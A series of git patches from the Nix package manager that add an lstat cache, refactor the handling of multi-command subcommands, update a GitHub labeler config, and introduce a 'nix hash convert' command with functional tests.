toHash(*git_tree_entry_id(entry)); } - std::map lookupCache; + std::unordered_map lookupCache; /* Recursively look up 'path' relative to the root. */ git_tree_entry * lookup(const CanonPath & path) diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index 6d0519f4f..6aff4ec0d 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -205,8 +205,19 @@ public: * `CanonPath(this.makeRelative(x), this) == path`. */ std::string makeRelative(const CanonPath & path) const; + + friend class std::hash; }; std::ostream & operator << (std::ostream & stream, const CanonPath & path); } + +template<> +struct std::hash +{ + std::size_t operator ()(const nix::CanonPath & s) const noexcept + { + return std::hash{}(s.path); + } +}; From 57246c4c3802920e6167fd540dae2a0abca97f15 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 13:55:07 +0100 Subject: [PATCH 050/654] PosixSourceAccessor: Cache lstat() calls Since we're doing a lot of them in assertNoSymlinks(). 
--- src/libutil/posix-source-accessor.cc | 56 +++++++++++++++++++--------- src/libutil/posix-source-accessor.hh | 4 ++ 2 files changed, 42 insertions(+), 18 deletions(-) diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index 0601e6387..15ff76e59 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -1,5 +1,8 @@ #include "posix-source-accessor.hh" #include "signals.hh" +#include "sync.hh" + +#include namespace nix { @@ -46,23 +49,45 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path) return nix::pathExists(path.abs()); } +std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path) +{ + static Sync>> _cache; + + { + auto cache(_cache.lock()); + auto i = cache->find(path); + if (i != cache->end()) return i->second; + } + + std::optional st{std::in_place}; + if (::lstat(path.c_str(), &*st)) { + if (errno == ENOENT || errno == ENOTDIR) + st.reset(); + else + throw SysError("getting status of '%s'", showPath(path)); + } + + auto cache(_cache.lock()); + if (cache->size() >= 16384) cache->clear(); + cache->emplace(path, st); + + return st; +} + std::optional PosixSourceAccessor::maybeLstat(const CanonPath & path) { if (auto parent = path.parent()) assertNoSymlinks(*parent); - struct stat st; - if (::lstat(path.c_str(), &st)) { - if (errno == ENOENT || errno == ENOTDIR) return std::nullopt; - throw SysError("getting status of '%s'", showPath(path)); - } - mtime = std::max(mtime, st.st_mtime); + auto st = cachedLstat(path); + if (!st) return std::nullopt; + mtime = std::max(mtime, st->st_mtime); return Stat { .type = - S_ISREG(st.st_mode) ? tRegular : - S_ISDIR(st.st_mode) ? tDirectory : - S_ISLNK(st.st_mode) ? tSymlink : + S_ISREG(st->st_mode) ? tRegular : + S_ISDIR(st->st_mode) ? tDirectory : + S_ISLNK(st->st_mode) ? tSymlink : tMisc, - .fileSize = S_ISREG(st.st_mode) ? 
std::optional(st.st_size) : std::nullopt, - .isExecutable = S_ISREG(st.st_mode) && st.st_mode & S_IXUSR, + .fileSize = S_ISREG(st->st_mode) ? std::optional(st->st_size) : std::nullopt, + .isExecutable = S_ISREG(st->st_mode) && st->st_mode & S_IXUSR, }; } @@ -95,14 +120,9 @@ std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & void PosixSourceAccessor::assertNoSymlinks(CanonPath path) { - // FIXME: cache this since it potentially causes a lot of lstat calls. while (!path.isRoot()) { - struct stat st; - if (::lstat(path.c_str(), &st)) { - if (errno != ENOENT) - throw SysError("getting status of '%s'", showPath(path)); - } - if (S_ISLNK(st.st_mode)) + auto st = cachedLstat(path); + if (st && S_ISLNK(st->st_mode)) throw Error("path '%s' is a symlink", showPath(path)); path.pop(); } diff --git a/src/libutil/posix-source-accessor.hh b/src/libutil/posix-source-accessor.hh index 7189a40e5..b2bd39805 100644 --- a/src/libutil/posix-source-accessor.hh +++ b/src/libutil/posix-source-accessor.hh @@ -30,10 +30,14 @@ struct PosixSourceAccessor : virtual SourceAccessor std::optional getPhysicalPath(const CanonPath & path) override; +private: + /** * Throw an error if `path` or any of its ancestors are symlinks. */ void assertNoSymlinks(CanonPath path); + + std::optional cachedLstat(const CanonPath & path); }; } From 53ab5d87c2eef72202bd76eb43e072636bbc72e8 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 14:05:32 +0100 Subject: [PATCH 051/654] Use expectStderr --- tests/functional/restricted.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index 2d6ab964b..3de26eb36 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -14,7 +14,7 @@ nix-instantiate --restrict-eval --eval -E 'builtins.readFile ./simple.nix' -I sr (! 
nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel') nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel' -I src=../../src -(! nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ') +expectStderr 1 nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ' | grepQuiet "forbidden in restricted mode" nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ' -I src=. p=$(nix eval --raw --expr "builtins.fetchurl file://$(pwd)/restricted.sh" --impure --restrict-eval --allowed-uris "file://$(pwd)") From ee8540ae9055791cfec4cbf8cb6335368b867acc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Wed, 6 Dec 2023 14:07:08 +0100 Subject: [PATCH 052/654] Fix the labeler.yml config file labeler 5.0 changed the configuration file in a non-backwards-compatible way (https://github.com/actions/labeler/tree/main#breaking-changes-in-v5), so update our config file to match that (because all the CIs are red otherwise :grimacing: ). 
--- .github/labeler.yml | 31 +++++++++++++++++++------------ 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/.github/labeler.yml b/.github/labeler.yml index 7544f07a6..b1b18c488 100644 --- a/.github/labeler.yml +++ b/.github/labeler.yml @@ -1,23 +1,30 @@ "documentation": - - doc/manual/* - - src/nix/**/*.md + - changed-files: + - any-glob-to-any-file: "doc/manual/*" + - any-glob-to-any-file: "src/nix/**/*.md" "store": - - src/libstore/store-api.* - - src/libstore/*-store.* + - changed-files: + - any-glob-to-any-file: "src/libstore/store-api.*" + - any-glob-to-any-file: "src/libstore/*-store.*" "fetching": - - src/libfetchers/**/* + - changed-files: + - any-glob-to-any-file: "src/libfetchers/**/*" "repl": - - src/libcmd/repl.* - - src/nix/repl.* + - changed-files: + - any-glob-to-any-file: "src/libcmd/repl.*" + - any-glob-to-any-file: "src/nix/repl.*" "new-cli": - - src/nix/**/* + - changed-files: + - any-glob-to-any-file: "src/nix/**/*" "with-tests": - # Unit tests - - src/*/tests/**/* - # Functional and integration tests - - tests/functional/**/* + - changed-files: + # Unit tests + - any-glob-to-any-file: "src/*/tests/**/*" + # Functional and integration tests + - any-glob-to-any-file: "tests/functional/**/*" + From 2bd83225004012af97d2d5977dc1de952f60aa8d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 14:08:40 +0100 Subject: [PATCH 053/654] Update src/libfetchers/filtering-input-accessor.hh Co-authored-by: Robert Hensing --- src/libfetchers/filtering-input-accessor.hh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index 209d26974..e1b83c929 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -13,8 +13,8 @@ typedef std::function MakeNotAllowe /** * An abstract wrapping `InputAccessor` that performs access - * control. 
Subclasses should override `checkAccess()` to implement an - * access control policy. + * control. Subclasses should override `isAllowed()` to implement an + * access control policy. The error message is customized at construction. */ struct FilteringInputAccessor : InputAccessor { From 7fff625e39fa6b11c4c61eeacadc70a0253bdab6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Wed, 6 Dec 2023 14:13:45 +0100 Subject: [PATCH 054/654] =?UTF-8?q?Improve=20the=20error=20message=20for?= =?UTF-8?q?=20=E2=80=9Cmulticommands=E2=80=9D=20commands=20(#9510)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Factor out the default `MultiCommand` behavior All the `MultiCommand`s had (nearly) the same behavior when called without a subcommand. Factor out this behavior into the `NixMultiCommand` class. * Display the list of available subcommands when none is specified Whenever a user runs a command that excepts a subcommand, add the list of available subcommands to the error message. 
* Print the multi-command lists as Markdown lists This takes more screen real estate, but is also much more readable than a comma-separated list --- src/libcmd/command.cc | 14 ++++++++++++++ src/libcmd/command.hh | 6 +++++- src/libutil/args.cc | 5 +++-- src/libutil/args.hh | 9 ++++++--- src/nix/config.cc | 11 ++--------- src/nix/derivation.cc | 11 ++--------- src/nix/flake.cc | 8 ++++---- src/nix/hash.cc | 11 +++-------- src/nix/main.cc | 2 +- src/nix/nar.cc | 9 +-------- src/nix/profile.cc | 11 +++-------- src/nix/realisation.cc | 11 ++--------- src/nix/registry.cc | 14 ++++---------- src/nix/sigs.cc | 11 +++-------- src/nix/store.cc | 11 ++--------- 15 files changed, 55 insertions(+), 89 deletions(-) diff --git a/src/libcmd/command.cc b/src/libcmd/command.cc index de9f546fc..369fa6004 100644 --- a/src/libcmd/command.cc +++ b/src/libcmd/command.cc @@ -1,4 +1,5 @@ #include "command.hh" +#include "markdown.hh" #include "store-api.hh" #include "local-fs-store.hh" #include "derivations.hh" @@ -34,6 +35,19 @@ nlohmann::json NixMultiCommand::toJSON() return MultiCommand::toJSON(); } +void NixMultiCommand::run() +{ + if (!command) { + std::set subCommandTextLines; + for (auto & [name, _] : commands) + subCommandTextLines.insert(fmt("- `%s`", name)); + std::string markdownError = fmt("`nix %s` requires a sub-command. 
Available sub-commands:\n\n%s\n", + commandName, concatStringsSep("\n", subCommandTextLines)); + throw UsageError(renderMarkdownToTerminal(markdownError)); + } + command->second->run(); +} + StoreCommand::StoreCommand() { } diff --git a/src/libcmd/command.hh b/src/libcmd/command.hh index 120c832ac..4a72627ed 100644 --- a/src/libcmd/command.hh +++ b/src/libcmd/command.hh @@ -26,9 +26,13 @@ static constexpr Command::Category catNixInstallation = 102; static constexpr auto installablesCategory = "Options that change the interpretation of [installables](@docroot@/command-ref/new-cli/nix.md#installables)"; -struct NixMultiCommand : virtual MultiCommand, virtual Command +struct NixMultiCommand : MultiCommand, virtual Command { nlohmann::json toJSON() override; + + using MultiCommand::MultiCommand; + + virtual void run() override; }; // For the overloaded run methods diff --git a/src/libutil/args.cc b/src/libutil/args.cc index 4480a03f5..c4b2975ee 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -483,7 +483,7 @@ bool Args::processArgs(const Strings & args, bool finish) if (!anyCompleted) exp.handler.fun(ss); - /* Move the list element to the processedArgs. This is almost the same as + /* Move the list element to the processedArgs. This is almost the same as `processedArgs.push_back(expectedArgs.front()); expectedArgs.pop_front()`, except that it will only adjust the next and prev pointers of the list elements, meaning the actual contents don't move in memory. 
This is @@ -622,8 +622,9 @@ std::optional Command::experimentalFeature () return { Xp::NixCommand }; } -MultiCommand::MultiCommand(const Commands & commands_) +MultiCommand::MultiCommand(std::string_view commandName, const Commands & commands_) : commands(commands_) + , commandName(commandName) { expectArgs({ .label = "subcommand", diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 7af82b178..72278dccc 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -223,11 +223,11 @@ protected: std::list expectedArgs; /** * List of processed positional argument forms. - * + * * All items removed from `expectedArgs` are added here. After all * arguments were processed, this list should be exactly the same as * `expectedArgs` was before. - * + * * This list is used to extend the lifetime of the argument forms. * If this is not done, some closures that reference the command * itself will segfault. @@ -356,13 +356,16 @@ public: */ std::optional>> command; - MultiCommand(const Commands & commands); + MultiCommand(std::string_view commandName, const Commands & commands); bool processFlag(Strings::iterator & pos, Strings::iterator end) override; bool processArgs(const Strings & args, bool finish) override; nlohmann::json toJSON() override; + +protected: + std::string commandName = ""; }; Strings argvToStrings(int argc, char * * argv); diff --git a/src/nix/config.cc b/src/nix/config.cc index 5b280d11d..52706afcf 100644 --- a/src/nix/config.cc +++ b/src/nix/config.cc @@ -7,9 +7,9 @@ using namespace nix; -struct CmdConfig : virtual NixMultiCommand +struct CmdConfig : NixMultiCommand { - CmdConfig() : MultiCommand(RegisterCommand::getCommandsFor({"config"})) + CmdConfig() : NixMultiCommand("config", RegisterCommand::getCommandsFor({"config"})) { } std::string description() override @@ -18,13 +18,6 @@ struct CmdConfig : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix 
config' requires a sub-command."); - command->second->run(); - } }; struct CmdConfigShow : Command, MixJSON diff --git a/src/nix/derivation.cc b/src/nix/derivation.cc index cd3975a4f..59a78d378 100644 --- a/src/nix/derivation.cc +++ b/src/nix/derivation.cc @@ -2,9 +2,9 @@ using namespace nix; -struct CmdDerivation : virtual NixMultiCommand +struct CmdDerivation : NixMultiCommand { - CmdDerivation() : MultiCommand(RegisterCommand::getCommandsFor({"derivation"})) + CmdDerivation() : NixMultiCommand("derivation", RegisterCommand::getCommandsFor({"derivation"})) { } std::string description() override @@ -13,13 +13,6 @@ struct CmdDerivation : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix derivation' requires a sub-command."); - command->second->run(); - } }; static auto rCmdDerivation = registerCommand("derivation"); diff --git a/src/nix/flake.cc b/src/nix/flake.cc index e0c67fdfa..2b6e56283 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -1399,7 +1399,9 @@ struct CmdFlakePrefetch : FlakeCommand, MixJSON struct CmdFlake : NixMultiCommand { CmdFlake() - : MultiCommand({ + : NixMultiCommand( + "flake", + { {"update", []() { return make_ref(); }}, {"lock", []() { return make_ref(); }}, {"metadata", []() { return make_ref(); }}, @@ -1429,10 +1431,8 @@ struct CmdFlake : NixMultiCommand void run() override { - if (!command) - throw UsageError("'nix flake' requires a sub-command."); experimentalFeatureSettings.require(Xp::Flakes); - command->second->run(); + NixMultiCommand::run(); } }; diff --git a/src/nix/hash.cc b/src/nix/hash.cc index d6595dcca..ededf6ef2 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -130,7 +130,9 @@ struct CmdToBase : Command struct CmdHash : NixMultiCommand { CmdHash() - : MultiCommand({ + : NixMultiCommand( + "hash", + { {"file", []() { return make_ref(FileIngestionMethod::Flat);; }}, {"path", []() { return 
make_ref(FileIngestionMethod::Recursive); }}, {"to-base16", []() { return make_ref(HashFormat::Base16); }}, @@ -146,13 +148,6 @@ struct CmdHash : NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix hash' requires a sub-command."); - command->second->run(); - } }; static auto rCmdHash = registerCommand("hash"); diff --git a/src/nix/main.cc b/src/nix/main.cc index 3d44e4a9d..109d2cc04 100644 --- a/src/nix/main.cc +++ b/src/nix/main.cc @@ -67,7 +67,7 @@ struct NixArgs : virtual MultiCommand, virtual MixCommonArgs, virtual RootArgs bool helpRequested = false; bool showVersion = false; - NixArgs() : MultiCommand(RegisterCommand::getCommandsFor({})), MixCommonArgs("nix") + NixArgs() : MultiCommand("", RegisterCommand::getCommandsFor({})), MixCommonArgs("nix") { categories.clear(); categories[catHelp] = "Help commands"; diff --git a/src/nix/nar.cc b/src/nix/nar.cc index 9815410cf..8ad4f92a7 100644 --- a/src/nix/nar.cc +++ b/src/nix/nar.cc @@ -4,7 +4,7 @@ using namespace nix; struct CmdNar : NixMultiCommand { - CmdNar() : MultiCommand(RegisterCommand::getCommandsFor({"nar"})) + CmdNar() : NixMultiCommand("nar", RegisterCommand::getCommandsFor({"nar"})) { } std::string description() override @@ -20,13 +20,6 @@ struct CmdNar : NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix nar' requires a sub-command."); - command->second->run(); - } }; static auto rCmdNar = registerCommand("nar"); diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 476ddcd60..147b4680b 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -825,7 +825,9 @@ struct CmdProfileWipeHistory : virtual StoreCommand, MixDefaultProfile, MixDryRu struct CmdProfile : NixMultiCommand { CmdProfile() - : MultiCommand({ + : NixMultiCommand( + "profile", + { {"install", []() { return make_ref(); }}, {"remove", []() { return make_ref(); 
}}, {"upgrade", []() { return make_ref(); }}, @@ -848,13 +850,6 @@ struct CmdProfile : NixMultiCommand #include "profile.md" ; } - - void run() override - { - if (!command) - throw UsageError("'nix profile' requires a sub-command."); - command->second->run(); - } }; static auto rCmdProfile = registerCommand("profile"); diff --git a/src/nix/realisation.cc b/src/nix/realisation.cc index e19e93219..e1f231222 100644 --- a/src/nix/realisation.cc +++ b/src/nix/realisation.cc @@ -5,9 +5,9 @@ using namespace nix; -struct CmdRealisation : virtual NixMultiCommand +struct CmdRealisation : NixMultiCommand { - CmdRealisation() : MultiCommand(RegisterCommand::getCommandsFor({"realisation"})) + CmdRealisation() : NixMultiCommand("realisation", RegisterCommand::getCommandsFor({"realisation"})) { } std::string description() override @@ -16,13 +16,6 @@ struct CmdRealisation : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix realisation' requires a sub-command."); - command->second->run(); - } }; static auto rCmdRealisation = registerCommand("realisation"); diff --git a/src/nix/registry.cc b/src/nix/registry.cc index f509ccae8..0346ec1e0 100644 --- a/src/nix/registry.cc +++ b/src/nix/registry.cc @@ -196,10 +196,12 @@ struct CmdRegistryPin : RegistryCommand, EvalCommand } }; -struct CmdRegistry : virtual NixMultiCommand +struct CmdRegistry : NixMultiCommand { CmdRegistry() - : MultiCommand({ + : NixMultiCommand( + "registry", + { {"list", []() { return make_ref(); }}, {"add", []() { return make_ref(); }}, {"remove", []() { return make_ref(); }}, @@ -221,14 +223,6 @@ struct CmdRegistry : virtual NixMultiCommand } Category category() override { return catSecondary; } - - void run() override - { - experimentalFeatureSettings.require(Xp::Flakes); - if (!command) - throw UsageError("'nix registry' requires a sub-command."); - command->second->run(); - } }; static auto rCmdRegistry = 
registerCommand("registry"); diff --git a/src/nix/sigs.cc b/src/nix/sigs.cc index 39555c9ea..a57a407e6 100644 --- a/src/nix/sigs.cc +++ b/src/nix/sigs.cc @@ -205,7 +205,9 @@ struct CmdKeyConvertSecretToPublic : Command struct CmdKey : NixMultiCommand { CmdKey() - : MultiCommand({ + : NixMultiCommand( + "key", + { {"generate-secret", []() { return make_ref(); }}, {"convert-secret-to-public", []() { return make_ref(); }}, }) @@ -218,13 +220,6 @@ struct CmdKey : NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix key' requires a sub-command."); - command->second->run(); - } }; static auto rCmdKey = registerCommand("key"); diff --git a/src/nix/store.cc b/src/nix/store.cc index 2879e03b3..79b41e096 100644 --- a/src/nix/store.cc +++ b/src/nix/store.cc @@ -2,9 +2,9 @@ using namespace nix; -struct CmdStore : virtual NixMultiCommand +struct CmdStore : NixMultiCommand { - CmdStore() : MultiCommand(RegisterCommand::getCommandsFor({"store"})) + CmdStore() : NixMultiCommand("store", RegisterCommand::getCommandsFor({"store"})) { } std::string description() override @@ -13,13 +13,6 @@ struct CmdStore : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix store' requires a sub-command."); - command->second->run(); - } }; static auto rCmdStore = registerCommand("store"); From e7abf60a0c8db19927e4fb195789b698c84e8d5a Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 25 Nov 2023 17:33:44 +0100 Subject: [PATCH 055/654] hash.cc/hash.h: Minor C++ improvements --- src/libutil/hash.hh | 14 +++++++------- src/nix/hash.cc | 2 +- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 6ade6555c..0e5c91b79 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -52,7 +52,7 @@ struct Hash /** * Create a zero-filled hash object. 
*/ - Hash(HashType type); + explicit Hash(HashType type); /** * Parse the hash from a string representation in the format @@ -103,7 +103,7 @@ public: /** * Returns the length of a base-16 representation of this hash. */ - size_t base16Len() const + [[nodiscard]] size_t base16Len() const { return hashSize * 2; } @@ -111,7 +111,7 @@ public: /** * Returns the length of a base-32 representation of this hash. */ - size_t base32Len() const + [[nodiscard]] size_t base32Len() const { return (hashSize * 8 - 1) / 5 + 1; } @@ -119,7 +119,7 @@ public: /** * Returns the length of a base-64 representation of this hash. */ - size_t base64Len() const + [[nodiscard]] size_t base64Len() const { return ((4 * hashSize / 3) + 3) & ~3; } @@ -129,14 +129,14 @@ public: * or base-64. By default, this is prefixed by the hash type * (e.g. "sha256:"). */ - std::string to_string(HashFormat hashFormat, bool includeType) const; + [[nodiscard]] std::string to_string(HashFormat hashFormat, bool includeType) const; - std::string gitRev() const + [[nodiscard]] std::string gitRev() const { return to_string(HashFormat::Base16, false); } - std::string gitShortRev() const + [[nodiscard]] std::string gitShortRev() const { return std::string(to_string(HashFormat::Base16, false), 0, 7); } diff --git a/src/nix/hash.cc b/src/nix/hash.cc index ededf6ef2..cac65006b 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -17,7 +17,7 @@ struct CmdHashBase : Command std::vector paths; std::optional modulus; - CmdHashBase(FileIngestionMethod mode) : mode(mode) + explicit CmdHashBase(FileIngestionMethod mode) : mode(mode) { addFlag({ .longName = "sri", From 156ea78d7402368e3816855800eb6e0ed33a1ecc Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 25 Nov 2023 17:34:16 +0100 Subject: [PATCH 056/654] CmdHashBase: doc comment --- src/nix/hash.cc | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/src/nix/hash.cc b/src/nix/hash.cc index cac65006b..dfef44221 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ 
-8,6 +8,11 @@ using namespace nix; +/** + * Base for `nix hash file` (deprecated), `nix hash path` and `nix-hash` (legacy). + * + * Deprecation Issue: https://github.com/NixOS/nix/issues/8876 + */ struct CmdHashBase : Command { FileIngestionMethod mode; From 6bbd900d4f9983f74dcd9a0f85ab899331f661c7 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 25 Nov 2023 17:35:24 +0100 Subject: [PATCH 057/654] nix hash convert: added This deviated from the proposal! See comments on the issue. https://github.com/NixOS/nix/issues/8876 --- src/nix/hash.cc | 63 ++++++++++++++++++++++++++++++++++++++++ tests/functional/hash.sh | 19 +++++++++++- 2 files changed, 81 insertions(+), 1 deletion(-) diff --git a/src/nix/hash.cc b/src/nix/hash.cc index dfef44221..2b32ac03c 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -132,12 +132,75 @@ struct CmdToBase : Command } }; +/** + * `nix hash convert` + */ +struct CmdHashConvert : Command +{ + std::optional from; + HashFormat to; + std::optional type; + std::vector hashStrings; + + CmdHashConvert(): to(HashFormat::SRI) { + addFlag({ + .longName = "from", + // TODO: List format choices. Maybe introduce a constant? + .description = "The format of the input hash.", + .labels = {"hash format"}, + .handler = {[this](std::string str) { + from = parseHashFormat(str); + }}, + }); + addFlag({ + .longName = "to", + // TODO: List format choices. Maybe introduce a constant? + .description = "The format of the output hash.", + .labels = {"hash format"}, + .handler = {[this](std::string str) { + to = parseHashFormat(str); + }}, + }); + addFlag({ + .longName = "type", + .description = "Specify the type if it can't be auto-detected.", + .labels = {"hash type"}, + .handler = {[this](std::string str) { + type = parseHashType(str); + }}, + }); + expectArgs({ + .label = "hashes", + .handler = {&hashStrings}, + }); + } + + std::string description() override + { + return "convert between different hash formats, e.g. 
base16 and sri."; + } + + Category category() override { return catUtility; } + + void run() override { + for (const auto& s: hashStrings) { + Hash h = Hash::parseAny(s, type); + if (from && h.to_string(*from, from == HashFormat::SRI) != s) { + auto from_as_string = printHashFormat(*from); + throw BadHash("input hash '%s' does not have the expected format '--from %s'", s, from_as_string); + } + logger->cout(h.to_string(to, to == HashFormat::SRI)); + } + } +}; + struct CmdHash : NixMultiCommand { CmdHash() : NixMultiCommand( "hash", { + {"convert", []() { return make_ref();}}, {"file", []() { return make_ref(FileIngestionMethod::Flat);; }}, {"path", []() { return make_ref(FileIngestionMethod::Recursive); }}, {"to-base16", []() { return make_ref(HashFormat::Base16); }}, diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 34c1bb38a..d66b27a26 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -81,24 +81,41 @@ rm $TEST_ROOT/hash-path/hello ln -s x $TEST_ROOT/hash-path/hello try2 md5 "f78b733a68f5edbdf9413899339eaa4a" -# Conversion. 
+# Conversion with `nix hash` `nix-hash` and `nix hash convert` try3() { + # $1 = hash type + # $2 = expected hash in base16 + # $3 = expected hash in base32 + # $4 = expected hash in base64 + h64=$(nix hash convert --type "$1" --to base64 "$2") + [ "$h64" = "$4" ] h64=$(nix-hash --type "$1" --to-base64 "$2") [ "$h64" = "$4" ] + # Deprecated experiment h64=$(nix hash to-base64 --type "$1" "$2") [ "$h64" = "$4" ] + + sri=$(nix hash convert --type "$1" --to sri "$2") + [ "$sri" = "$1-$4" ] sri=$(nix-hash --type "$1" --to-sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix hash to-sri --type "$1" "$2") [ "$sri" = "$1-$4" ] + h32=$(nix hash convert --type "$1" --to base32 "$2") + [ "$h32" = "$3" ] h32=$(nix-hash --type "$1" --to-base32 "$2") [ "$h32" = "$3" ] h32=$(nix hash to-base32 --type "$1" "$2") [ "$h32" = "$3" ] h16=$(nix-hash --type "$1" --to-base16 "$h32") [ "$h16" = "$2" ] + + h16=$(nix hash convert --type "$1" --to base16 "$h64") + [ "$h16" = "$2" ] h16=$(nix hash to-base16 --type "$1" "$h64") [ "$h16" = "$2" ] + h16=$(nix hash convert --to base16 "$sri") + [ "$h16" = "$2" ] h16=$(nix hash to-base16 "$sri") [ "$h16" = "$2" ] } From 0c2d5f7673ae0196b660c39b59941755103c23d0 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 11:42:52 +0100 Subject: [PATCH 058/654] nix hash convert: s/--type/--algo/ + more functional tests https://github.com/NixOS/nix/issues/8876 --- src/libutil/hash.hh | 1 - src/nix/hash.cc | 8 ++--- tests/functional/hash.sh | 72 +++++++++++++++++++++++++++++++++++++--- 3 files changed, 71 insertions(+), 10 deletions(-) diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 0e5c91b79..820154e7a 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -40,7 +40,6 @@ enum struct HashFormat : int { SRI }; - struct Hash { constexpr static size_t maxHashSize = 64; diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 2b32ac03c..62f96ef1d 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -162,9 +162,9 @@ struct CmdHashConvert : 
Command }}, }); addFlag({ - .longName = "type", - .description = "Specify the type if it can't be auto-detected.", - .labels = {"hash type"}, + .longName = "algo", + .description = "Specify the algorithm if it can't be auto-detected.", + .labels = {"hash algorithm"}, .handler = {[this](std::string str) { type = parseHashType(str); }}, @@ -177,7 +177,7 @@ struct CmdHashConvert : Command std::string description() override { - return "convert between different hash formats, e.g. base16 and sri."; + return "convert between different hash formats, e.g. base16, nix32, base64 and sri."; } Category category() override { return catUtility; } diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index d66b27a26..031e33adf 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -83,11 +83,11 @@ try2 md5 "f78b733a68f5edbdf9413899339eaa4a" # Conversion with `nix hash` `nix-hash` and `nix hash convert` try3() { - # $1 = hash type + # $1 = hash algo # $2 = expected hash in base16 # $3 = expected hash in base32 # $4 = expected hash in base64 - h64=$(nix hash convert --type "$1" --to base64 "$2") + h64=$(nix hash convert --algo "$1" --to base64 "$2") [ "$h64" = "$4" ] h64=$(nix-hash --type "$1" --to-base64 "$2") [ "$h64" = "$4" ] @@ -95,13 +95,13 @@ try3() { h64=$(nix hash to-base64 --type "$1" "$2") [ "$h64" = "$4" ] - sri=$(nix hash convert --type "$1" --to sri "$2") + sri=$(nix hash convert --algo "$1" --to sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix-hash --type "$1" --to-sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix hash to-sri --type "$1" "$2") [ "$sri" = "$1-$4" ] - h32=$(nix hash convert --type "$1" --to base32 "$2") + h32=$(nix hash convert --algo "$1" --to base32 "$2") [ "$h32" = "$3" ] h32=$(nix-hash --type "$1" --to-base32 "$2") [ "$h32" = "$3" ] @@ -110,7 +110,7 @@ try3() { h16=$(nix-hash --type "$1" --to-base16 "$h32") [ "$h16" = "$2" ] - h16=$(nix hash convert --type "$1" --to base16 "$h64") + h16=$(nix hash convert --algo "$1" --to base16 "$h64") [ 
